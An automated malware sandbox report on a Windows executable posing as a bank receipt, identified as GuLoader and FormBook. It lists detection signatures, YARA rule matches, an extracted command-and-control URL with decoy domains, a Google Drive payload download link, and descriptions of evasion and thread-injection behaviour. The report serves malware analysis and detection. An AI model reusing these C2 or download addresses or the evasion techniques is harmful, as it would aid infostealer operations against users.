Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Sample Name: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Analysis ID: 540355
MD5: 72a345c95142aee60e7df54b570c2c6b
SHA1: aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256: a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
Tags: exeFormbookguloaderxloader
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}
Multi AV Scanner detection for submitted file
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Metadefender: Detection: 14% Perma Link
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesocialmediacreator.com/i638/ Virustotal: Detection: 5% Perma Link
Machine Learning detection for sample
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.nongrav.exe.560000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3f3796c.4.unpack Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3214020.1.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE

Compliance:

barindex
Uses 32bit PE files
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00F321E7

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop esi 22_2_02D35825

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.thesocialmediacreator.com/i638/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: nongrav.exe, 00000001.00000002.507440632.00000000006BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Uses 32bit PE files
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00F31DC7
Detected potential crypto function
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F35B88 0_2_00F35B88
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_004015E0 1_2_004015E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAD227 1_2_02AAD227
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA9248 1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA8F8B 1_2_02AA8F8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA969B 1_2_02AA969B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAA67E 1_2_02AAA67E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA8049 1_2_02AA8049
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAB7B8 1_2_02AAB7B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA01F8 1_2_02AA01F8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AAC112 1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00408C6B 15_2_00408C6B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00408C70 15_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB922AE 15_2_1EB922AE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB92EF7 15_2_1EB92EF7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE6E30 15_2_1EAE6E30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFEBB0 15_2_1EAFEBB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB91FF1 15_2_1EB91FF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8DBD2 15_2_1EB8DBD2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB92B28 15_2_1EB92B28
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB920A8 15_2_1EB920A8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB090 15_2_1EADB090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB928EC 15_2_1EB928EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD841F 15_2_1EAD841F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81002 15_2_1EB81002
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADD5E0 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB925DD 15_2_1EB925DD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC0D20 15_2_1EAC0D20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACF900 15_2_1EACF900
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB92D07 15_2_1EB92D07
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB91D55 15_2_1EB91D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5EBB0 22_2_03A5EBB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A46E30 22_2_03A46E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A20D20 22_2_03A20D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2F900 22_2_03A2F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF1D55 22_2_03AF1D55
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3B090 22_2_03A3B090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE1002 22_2_03AE1002
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3841F 22_2_03A3841F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3D1FB 22_2_02D3D1FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3C944 22_2_02D3C944
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D22FB0 22_2_02D22FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D28C70 22_2_02D28C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D28C6B 22_2_02D28C6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D22D90 22_2_02D22D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D22D87 22_2_02D22D87
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: String function: 1EACB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA9248 NtAllocateVirtualMemory, 1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AACBBD NtProtectVirtualMemory, 1_2_02AACBBD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00418680 NtReadFile, 15_2_00418680
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004185D0 NtCreateFile, 15_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004187B0 NtAllocateVirtualMemory, 15_2_004187B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_0041867C NtCreateFile,NtReadFile, 15_2_0041867C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00418622 NtCreateFile, 15_2_00418622
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004185CD NtCreateFile, 15_2_004185CD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004187AA NtAllocateVirtualMemory, 15_2_004187AA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB096E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_1EB096E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A20 NtResumeThread,LdrInitializeThunk, 15_2_1EB09A20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A00 NtProtectVirtualMemory,LdrInitializeThunk, 15_2_1EB09A00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_1EB09660
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A50 NtCreateFile,LdrInitializeThunk, 15_2_1EB09A50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB097A0 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_1EB097A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09780 NtMapViewOfSection,LdrInitializeThunk, 15_2_1EB09780
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09FE0 NtCreateMutant,LdrInitializeThunk, 15_2_1EB09FE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09710 NtQueryInformationToken,LdrInitializeThunk, 15_2_1EB09710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB098F0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_1EB098F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_1EB09860
